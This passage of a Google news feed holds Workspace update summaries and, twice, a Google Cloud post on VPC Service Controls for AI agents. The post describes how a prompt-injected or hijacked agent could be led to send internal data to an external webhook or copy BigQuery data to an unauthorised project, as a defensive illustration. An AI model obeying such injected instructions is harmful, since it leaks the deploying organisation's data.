Workspace&lt;/h3&gt;&lt;div&gt;Google Workspace administrators can now utilize incremental exports when backing up organizational data. Instead of re-exporting their entire organization's data, admins can export frequent snapshots of their data into their organization’s own Google Cloud Storage (GCS) bucket. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/streamline-your-data-backups-with-incremental-exports-for-Google-Workspace.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size: x-small;"&gt;&lt;i&gt;The announcements above were published on the Workspace Updates blog over the last week. Please refer to the original blog posts for complete details.&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/weekly-recap-06-26-2026.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-26T18:52:29+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/weekly-recap-06-26-2026.html</id>
    <title>Google Workspace Weekly Recap - June 26, 2026</title>
    <updated>2026-06-26T18:52:29+00:00</updated>
    <content type="html">&lt;h3 style="text-align: left;"&gt;Troubleshoot formula errors quickly with Gemini in Google Sheets&lt;/h3&gt;&lt;div&gt;We’re excited to introduce a new Gemini in Sheets capability that enables you to diagnose and fix formula errors in one click. When you encounter a formula error, Gemini can analyze the surrounding data structure to help provide an easy-to-understand explanation of the core issue alongside a corrected version of the formula. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/troubleshoot-formula-errors-in-sheets.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Enhanced security monitoring with expanded Admin password reset alerts&lt;/h3&gt;&lt;div&gt;In Alert Center, we are expanding the existing “Super Admin password reset” alert into a broader Admin password reset alert.&amp;nbsp;With this update, the alert will now cover password resets for all administrator roles within your organization.&amp;nbsp;| &lt;a href="https://workspaceupdates.googleblog.com/2026/06/enhanced-security-monitoring-with-expanded-Admin-password-reset-alerts.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Join Google Meet calls from Safari on iOS devices&lt;/h3&gt;&lt;div&gt;Prior to this update, iOS users without the Gmail or Meet apps were unable to participate in Google Meet sessions on their mobile devices. Now, iOS mobile device users can join meetings directly through Safari, without needing to install an app. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/join-google-meet-calls-from-safari-on-iOS-devices.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Google Apps Script is now a Google Workspace core service with enterprise-grade data protection&lt;/h3&gt;&lt;div&gt;Google Apps Script is officially a Google Workspace core service. Covered under the Google Cloud Terms of Service and Google Workspace for Education Terms of Service, Apps Script now offers the same enterprise-grade data protection, robust administrative controls, and standard technical support that safeguards other core services. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/google-apps-script-workspace-core-service.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Connect to Google Meet hardware with room codes now in Early Preview&lt;/h3&gt;&lt;div&gt;Google Meet users can now connect to nearby conference room hardware by entering a 5-character room code on their personal device. Meet recently launched Connect Room using proximity-based detection to identify nearby hardware. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/room-codes-google-meet-hardware-early-preview.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Updates to Gemini in Google Classroom&lt;/h3&gt;&lt;div&gt;We are introducing several updates to the Gemini tab in Google Classroom designed to make its tools even more helpful for teachers. These changes make it easier for educators to collaborate with AI and create visual aids from any device, while expanding options for refining lesson plans. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/updates-to-gemini-in-google-classroom.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Stricter classifications for Google Groups to enhance data security and privacy&lt;/h3&gt;&lt;div&gt;Earlier this year, we announced changes to Google Groups to enhance data security and privacy. The changes, which are rolling out now. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/stricter-classifications-for-google-groups-to-enhance-data-security-and-privacy.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Read Along in Google Classroom is now available to all education users to support foundational literacy&lt;/h3&gt;&lt;div&gt;Read Along in Google Classroom, an AI-powered literacy tool that provides in-the-moment support to students as they read aloud, is now available to all Google Workspace for Education users at no cost. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/read-along-in-google-classroom-is-now-available-to-all-education-users-to-support-foundational-literacy.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Streamline your data backups with incremental exports for Google Workspace&lt;/h3&gt;&lt;div&gt;Google Workspace administrators can now utilize incremental exports when backing up organizational data. Instead of re-exporting their entire organization's data, admins can export frequent snapshots of their data into their organization’s own Google Cloud Storage (GCS) bucket. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/streamline-your-data-backups-with-incremental-exports-for-Google-Workspace.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size: x-small;"&gt;&lt;i&gt;The announcements above were published on the Workspace Updates blog over the last week. Please refer to the original blog posts for complete details.&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/weekly-recap-06-26-2026.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-26T18:52:29+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/accelerating-gemini-nano-models-on-pixel-with-frozen-multi-token-prediction/</id>
    <title>Accelerating Gemini Nano models on Pixel with frozen Multi-Token Prediction</title>
    <updated>2026-06-26T18:30:07+00:00</updated>
    <content type="html">Machine Intelligence</content>
    <link href="https://research.google/blog/accelerating-gemini-nano-models-on-pixel-with-frozen-multi-token-prediction/" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-26T18:30:07+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/accelerating-gemini-nano-models-on-pixel-with-frozen-multi-token-prediction</id>
    <title>Accelerating Gemini Nano models on Pixel with frozen Multi-Token Prediction</title>
    <updated>2026-06-26T18:30:00+00:00</updated>
    <content type="html">Machine Intelligence</content>
    <link href="https://research.google/blog/accelerating-gemini-nano-models-on-pixel-with-frozen-multi-token-prediction" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-06-26T18:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/securing-agentic-ai-whats-new-in-vpc-service-controls</id>
    <title>Securing agentic AI with perimeter guardrails: What's new in VPC Service Controls</title>
    <updated>2026-06-26T18:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As enterprises scale autonomous AI agents into production, enabling safe innovation requires robust architectural guardrails. AI agents connect across tools and datasets, so it’s essential to establish clear network-level boundaries for comprehensive data protection. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help organizations confidently deploy these workflows, we recommend &lt;/span&gt;&lt;a href="https://cloud.google.com/security/vpc-service-controls"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;VPC Service Controls&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (VPC-SC) to establish an essential network-level, destination-based perimeter. Today we’re announcing several new capabilities specifically designed for agentic workloads.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;What's new in VPC Service Controls&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Designed to enhance AI security, the new capabilities we’re announcing today strengthen boundaries enforced by VPC-SC.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The capability updates include:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Agent identity in directional rules&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Enforcing least-privilege access requires treating agents as first-class identities. You can now add &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/agent-identity-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;agentic identities&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; directly to service perimeter ingress and egress rules using standard &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/principals-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Identity and Access Management (IAM) principals&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;A single principal maps to an individual agent, while a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/vpc-service-controls/docs/supported-identities"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;principalSet&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; maps to a broader collection of agents. PrincipalSets lets administrators apply consistent, auditable access policies across agent fleets. If an agent is compromised, you can immediately revoke its access at the network perimeter.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Granular control with model context protocol (MCP) attributes&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: As MCP becomes the standard integration layer for agentic systems, the ability to enforce policy at the tool level is critical. VPC Service Controls now support conditional access rules based on specific &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/mcp/control-mcp-use-vpc-sc-perimeter"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;MCP&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; attributes, including &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;mcp.toolName&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;mcp.method&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;mcp.tool.isReadOnly&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span&gt;For example, you can grant an agent read access to a Workspace MCP server while explicitly denying its ability to send emails.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Securing the Gemini Enterprise Agent Platform&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The &lt;/span&gt;&lt;a href="https://cloud.google.com/products/gemini-enterprise-agent-platform"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; provides a comprehensive foundation for production-grade agent deployments. VPC Service Controls is now natively integrated with Agent Platform. When you include Agent Platform as a protected service within a VPC-SC perimeter, the system automatically blocks all public internet access to the Agent Platform instance — enforcing a secure boundary without additional configuration overhead.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"At Mercado Libre, VPC Service Controls serve as an essential, foundational layer of our security architecture. By building a strong perimeter enforcement across hundreds of Google Cloud projects in our organization, we established robust network-level security controls with VPC-SC, ensuring all our data remains protected in our cloud environment," said Juan Pablo Boschi, project lead at Mercado Libre.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Defining a layered approach to enterprise AI security with VPC-SC&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Securing an autonomous agent requires a layered approach. Identity, network, and resource controls each target a distinct threat vector.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Identity controls&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;IAM&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/principal-access-boundary-policies"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Principal Access Boundaries&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (PAB) focus on "who" can access specific resources. By enforcing strict least-privilege principles for agent identities, you help ensure that autonomous workloads only have the permissions necessary for their specific objectives.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Network controls&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="https://cloud.google.com/security/products/firewall"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Next-generation network firewalls&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and VPC Service Controls define a robust data perimeter on top of your infrastructure, governing the flow of information across boundaries and preventing data exfiltration.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Resource controls&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/organization-policy"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Organization Policy&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and other resource-level guardrails set broad, immutable constraints on how resources can be configured and used, preventing risky configurations by default.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While identity and network controls effectively secure the front door, VPC Service Controls provide a critical destination-based defense. In the probabilistic world of autonomous agents, VPC-SC is the control that focuses on the "how” and "where" of the agent’s network and operations, in addition to the “who”.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Defending against the unique attack vectors&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Unlike traditional applications, an AI agent's input can inadvertently prompt it to execute an unintended command or action. If an agent is successfully compromised — whether driven by malicious prompts, tool manipulation, or malicious insider commands — VPC Service Controls serves as a critical network safety net.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To illustrate how this network boundary defends against industry-standard risks as mapped by  the &lt;/span&gt;&lt;a href="https://genai.owasp.org/2025/12/09/owasp-top-10-for-agentic-applications-the-benchmark-for-agentic-security-in-the-age-of-autonomous-ai/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;OWASP Top 10 for LLM Applications&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, here are three real-world threat vectors where VPC Service Controls can help supplement identity-based controls to prevent data exfiltration. &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Exfiltration prevention via indirect prompt injection (OWASP ASI01)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: A malicious actor could attempt to embed a hidden prompt asking an agent to summarize internal data and transmit it to an unauthorized user. If the hijacked agent has IAM permissions, IAM detects no anomaly.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span&gt;However, when the agent tries to send that data to an external webhook, VPC-SC blocks the API-layer transfer because the destination is outside the defined perimeter.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Guardrail for tool misuse (OWASP ASI02, ASI08)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Prompt hijacks can lead agents to chain tools maliciously, such as sending internal directory data to an external service. By enforcing a VPC-SC perimeter around sensitive assets, you prevent misbehaving agents from bridging data across isolated trust zones.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Neutralizing insider threats (OWASP AS103)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Attackers can command a data-processing agent to perform a direct cloud-to-cloud copy from a BigQuery dataset to an unauthorized project. While network firewalls see legitimate HTTPS traffic to BigQuery, and IAM sees an authorized service account, VPC-SC evaluates the destination resource. Since the destination project is outside the enterprise perimeter, the system immediately denies the API request.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Pratik&amp;#x27;s blog image (1)" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Pratiks_blog_image_1.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;VPC Service Controls acts as a perimeter to block data exfiltration attempts from a compromised agent, even if the agent has valid IAM credentials.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Data protection for the autonomous agent world&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Perimeter security has evolved from a recommended best practice in the deterministic application and workload centric age to an absolute requirement for the era of autonomous AI agents. VPC-SC provides the necessary control over data movement that IAM cannot address alone. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In an era where agents interpret prompts as code, VPC-SC becomes the mandatory safety net for enterprise data. Pairing the mapping capability of IAM with the rigid data perimeters of VPC-SC lets organizations securely build agentic innovation while maintaining an absolute guardrail against exfiltration.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To learn more, you can explore VPC-SC resources &lt;/span&gt;&lt;a href="https://cloud.google.com/security/vpc-service-controls"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/identity-security/securing-agentic-ai-whats-new-in-vpc-service-controls" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-26T18:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/identity-security/securing-agentic-ai-whats-new-in-vpc-service-controls/</id>
    <title>Securing agentic AI with perimeter guardrails: What's new in VPC Service Controls</title>
    <updated>2026-06-26T18:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As enterprises scale autonomous AI agents into production, enabling safe innovation requires robust architectural guardrails. AI agents connect across tools and datasets, so it’s essential to establish clear network-level boundaries for comprehensive data protection. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help organizations confidently deploy these workflows, we recommend &lt;/span&gt;&lt;a href="https://cloud.google.com/security/vpc-service-controls"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;VPC Service Controls&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (VPC-SC) to establish an essential network-level, destination-based perimeter. Today we’re announcing several new capabilities specifically designed for agentic workloads.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;What's new in VPC Service Controls&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Designed to enhance AI security, the new capabilities we’re announcing today strengthen boundaries enforced by VPC-SC.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The capability updates include:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Agent identity in directional rules&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Enforcing least-privilege access requires treating agents as first-class identities. You can now add &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/agent-identity-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;agentic identities&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; directly to service perimeter ingress and egress rules using standard &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/principals-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Identity and Access Management (IAM) principals&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;A single principal maps to an individual agent, while a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/vpc-service-controls/docs/supported-identities"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;principalSet&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; maps to a broader collection of agents. PrincipalSets lets administrators apply consistent, auditable access policies across agent fleets. If an agent is compromised, you can immediately revoke its access at the network perimeter.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Granular control with model context protocol (MCP) attributes&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: As MCP becomes the standard integration layer for agentic systems, the ability to enforce policy at the tool level is critical. VPC Service Controls now support conditional access rules based on specific &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/mcp/control-mcp-use-vpc-sc-perimeter"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;MCP&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; attributes, including &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;mcp.toolName&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;mcp.method&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;mcp.tool.isReadOnly&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span&gt;For example, you can grant an agent read access to a Workspace MCP server while explicitly denying its ability to send emails.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Securing the Gemini Enterprise Agent Platform&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The &lt;/span&gt;&lt;a href="https://cloud.google.com/products/gemini-enterprise-agent-platform"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; provides a comprehensive foundation for production-grade agent deployments. VPC Service Controls is now natively integrated with Agent Platform. When you include Agent Platform as a protected service within a VPC-SC perimeter, the system automatically blocks all public internet access to the Agent Platform instance — enforcing a secure boundary without additional configuration overhead.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;"At Mercado Libre, VPC Service Controls serve as an essential, foundational layer of our security architecture. By building a strong perimeter enforcement across hundreds of Google Cloud projects in our organization, we established robust network-level security controls with VPC-SC, ensuring all our data remains protected in our cloud environment," said Juan Pablo Boschi, project lead at Mercado Libre.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Defining a layered approach to enterprise AI security with VPC-SC&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Securing an autonomous agent requires a layered approach. Identity, network, and resource controls each target a distinct threat vector.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Identity controls&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;IAM&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/iam/docs/principal-access-boundary-policies"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Principal Access Boundaries&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (PAB) focus on "who" can access specific resources. By enforcing strict least-privilege principles for agent identities, you help ensure that autonomous workloads only have the permissions necessary for their specific objectives.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Network controls&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="https://cloud.google.com/security/products/firewall"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Next-generation network firewalls&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and VPC Service Controls define a robust data perimeter on top of your infrastructure, governing the flow of information across boundaries and preventing data exfiltration.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Resource controls&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/organization-policy"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Organization Policy&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and other resource-level guardrails set broad, immutable constraints on how resources can be configured and used, preventing risky configurations by default.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While identity and network controls effectively secure the front door, VPC Service Controls provide a critical destination-based defense. In the probabilistic world of autonomous agents, VPC-SC is the control that focuses on the "how” and "where" of the agent’s network and operations, in addition to the “who”.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Defending against the unique attack vectors&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Unlike traditional applications, an AI agent's input can inadvertently prompt it to execute an unintended command or action. If an agent is successfully compromised — whether driven by malicious prompts, tool manipulation, or malicious insider commands — VPC Service Controls serves as a critical network safety net.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To illustrate how this network boundary defends against industry-standard risks as mapped by  the &lt;/span&gt;&lt;a href="https://genai.owasp.org/2025/12/09/owasp-top-10-for-agentic-applications-the-benchmark-for-agentic-security-in-the-age-of-autonomous-ai/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;OWASP Top 10 for LLM Applications&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, here are three real-world threat vectors where VPC Service Controls can help supplement identity-based controls to prevent data exfiltration. &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Exfiltration prevention via indirect prompt injection (OWASP ASI01)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: A malicious actor could attempt to embed a hidden prompt asking an agent to summarize internal data and transmit it to an unauthorized user. If the hijacked agent has IAM permissions, IAM detects no anomaly.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span&gt;However, when the agent tries to send that data to an external webhook, VPC-SC blocks the API-layer transfer because the destination is outside the defined perimeter.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
